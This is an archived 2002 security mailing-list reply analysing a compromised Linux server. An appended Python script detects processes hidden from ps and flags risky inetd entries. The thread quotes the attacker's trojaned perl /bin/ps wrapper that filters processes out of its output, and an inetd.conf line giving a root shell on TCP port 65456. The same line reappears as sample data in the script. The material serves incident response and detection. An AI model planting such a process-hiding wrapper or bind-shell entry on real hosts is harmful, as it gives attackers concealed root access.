Re: nouser - rootkit ?

From: Eric Brandwine (ericbat_private)
Date: Mon Mar 11 2002 - 09:57:38 PST


    >>>>> "du" == Dan Uscatu <duscatuat_private> writes:
    
    du>  [root@www /root]# cat /bin/ps
    du>  #!/usr/bin/perl
    du>  $xargs =join(' ',@ARGV);
    du>  $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
    du>  grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
    du>  print "$ps";
    
    WOW!  That is really lame!  It may qualify as the first cross-platform
    root kit I've ever seen though ;)
    
    This moron clearly does not know how to use perl regexps (among many
    other things).  At least use fgrep!
    
    du> I have scanned the machine using chkrootkit... the only funny thing found
    du> was an inetd.conf, containing:
    
    du>  [root@www nouser]# cat /etc/inetd.conf
    du> 65456    stream  tcp     nowait  root  /bin/sh     sh
    
    du>  of course, inetd is not installed :) that points me to the idea that the
    du> process was somehow automated... but I can't find any reference to a rootkit
    du> that does these changes. Seems pretty stupid for a rootkit anyway... but I
    du> want to be sure no other major changes were made... before I install the
    du> production server there.
    
    This looks like a clueless kiddie cobbled together a bunch of stuff he
    found on the net, and packaged it up.
    
    Either it's a red herring, and the real root kit is much better
    hidden, or it'll be almost trivial to clean up.  But you've no way of
    knowing.  I'd rebuild the box from scratch, if it were mine.
    
    Of much more importance is how he got in.  Scrape this loser off your
    box, and another one will take his place.  And the new one might not
    be quite so incompetent.
    
    ericb
    -- 
    Eric Brandwine     |  Contrary to the popular belief that it's hard to recover
    UUNetwork Security |  information, it's actually starting to appear that it's
    ericbat_private       |  very hard to remove something even if you want to.
    +1 703 886 6038    |      - Dan Farmer
    Key fingerprint = 3A39 2C2F D5A0 FC7C  5F60 4118 A84A BD5D  59D7 4E3E
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
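    As an added example (not from the original post, and not something the
    poster ran), the checks a responder would want against the box described
    above: a grep-based ps wrapper like the one shown hides any process whose
    line contains one of its filter strings, but the kernel still lists the PID
    under /proc, so cross-checking ps against /proc exposes the gap; a real ps
    is an ELF binary, not a perl script; and an inetd.conf entry that hands a
    root shell to a TCP port is a bind shell. The sample ps output, /proc
    listing and inetd.conf line below are constructed to mirror what was posted,
    and the paths /bin/ps and /etc/inetd.conf are assumed defaults.

```python
#!/usr/bin/env python3
"""Triage checks for a trojaned-ps / inetd bind-shell host (added example)."""
from __future__ import annotations
import os
import subprocess

# Strings the posted /bin/ps wrapper strips from the real ps output (grep -v chain).
TROJAN_FILTERS = ("nouser", "noshell", "proftp", "/bin/ps", "libxnotps")


def trojaned_ps(real_output: str) -> str:
    """Reproduce the wrapper's filtering so the demo below has something to catch."""
    return "\n".join(line for line in real_output.splitlines()
                     if not any(f in line for f in TROJAN_FILTERS))


def pids_from_ps(ps_output: str) -> set[int]:
    """PIDs reported by ps: second column of `ps aux` style output (header skipped)."""
    pids = set()
    for line in ps_output.splitlines()[1:]:
        fields = line.split()
        if len(fields) > 1 and fields[1].isdigit():
            pids.add(int(fields[1]))
    return pids


def pids_from_proc(proc_entries) -> set[int]:
    """PIDs the kernel exposes: numeric directory names in /proc."""
    return {int(e) for e in proc_entries if e.isdigit()}


def hidden_pids(proc_pids: set[int], ps_pids: set[int]) -> set[int]:
    """Processes the kernel knows about but ps did not report.
    Processes spawned between the two snapshots show up here too, so on a
    live box re-run a few times and trust only the PIDs that stay hidden."""
    return proc_pids - ps_pids


def looks_like_elf(header: bytes) -> bool:
    """A genuine ps starts with the ELF magic; the posted one starts with '#!'."""
    return header[:4] == b"\x7fELF"


def risky_inetd_lines(inetd_conf: str) -> list[tuple[str, str]]:
    """inetd.conf services that run a shell or interpreter as root."""
    risky = []
    for line in inetd_conf.splitlines():
        f = line.split()
        if len(f) >= 6 and not line.lstrip().startswith("#"):
            service, user, program = f[0], f[4], f[5]
            if user == "root" and os.path.basename(program) in ("sh", "bash", "perl"):
                risky.append((service, program))
    return risky


# --- constructed sample data, modelled on the thread, not taken from the box ---
REAL_PS = """USER       PID %CPU %MEM COMMAND
root         1  0.0  0.1 init
root       412  0.0  0.2 /usr/sbin/sshd
nouser     913  0.0  0.3 /home/nouser/.x/bind
root      1044  0.0  0.1 proftpd
root      1100  0.0  0.1 /bin/ps aux
"""
PROC_LISTING = ["1", "412", "913", "1044", "1100", "self", "cpuinfo", "meminfo"]
INETD_CONF = "65456    stream  tcp     nowait  root  /bin/sh     sh\n"


def demo() -> list[int]:
    """PIDs the trojaned wrapper would hide from the constructed ps output."""
    shown = pids_from_ps(trojaned_ps(REAL_PS))
    return sorted(hidden_pids(pids_from_proc(PROC_LISTING), shown))


def live_check(ps_path: str = "/bin/ps", inetd_path: str = "/etc/inetd.conf"):
    """Run the same three checks on the current Linux host (paths are assumptions)."""
    with open(ps_path, "rb") as fh:
        elf = looks_like_elf(fh.read(4))
    out = subprocess.run([ps_path, "aux"], capture_output=True, text=True).stdout
    hidden = hidden_pids(pids_from_proc(os.listdir("/proc")), pids_from_ps(out))
    risky = []
    if os.path.exists(inetd_path):
        with open(inetd_path) as fh:
            risky = risky_inetd_lines(fh.read())
    return elf, sorted(hidden), risky


if __name__ == "__main__":
    print("hidden by wrapper in sample data:", demo())
    print("inetd bind shells in sample data:", risky_inetd_lines(INETD_CONF))
```

    On the constructed data the wrapper hides the nouser bind process, proftpd
    (the filter is the substring "proftp") and the ps invocation itself, while
    the /proc listing still carries all three PIDs. Note that this only catches
    a userland trojan that filters output; a kernel-level rootkit can hide
    entries from /proc as well, which is the "real root kit is much better
    hidden" case Eric mentions and another reason to rebuild rather than clean.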
    



    This archive was generated by hypermail 2b30 : Mon Mar 11 2002 - 12:37:49 PST